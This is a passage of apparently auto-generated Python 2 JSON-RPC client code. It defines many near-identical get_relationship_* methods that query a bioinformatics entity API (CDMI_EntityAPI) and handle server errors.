if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRepresentativeOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRepresentativeOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRepresentedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRepresentedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRequirementOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRequirementOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsARequirementOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsARequirementOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasResultsIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasResultsIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasResultsFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasResultsFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasSection(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasSection',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSectionOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSectionOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasStep(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasStep',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsStepOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsStepOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasTrait(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasTrait',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Measures(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Measures',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasUnits(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasUnits',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsLocated(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsLocated',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasUsage(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasUsage',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsUsageOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsUsageOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasValueFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasValueFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasValueIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasValueIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasVariationIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasVariationIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsVariedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsVariedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Impacts(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Impacts',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsImpactedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsImpactedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ImplementsReaction(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ImplementsReaction',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ImplementedBasedOn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ImplementedBasedOn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Includes(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Includes',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsIncludedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsIncludedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludesAdditionalCompounds(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludesAdditionalCompounds',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludesAlignmentRow(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludesAlignmentRow',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAlignmentRowIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAlignmentRowIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludesPart(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludesPart',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsPartOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsPartOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IndicatedLevelsFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IndicatedLevelsFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
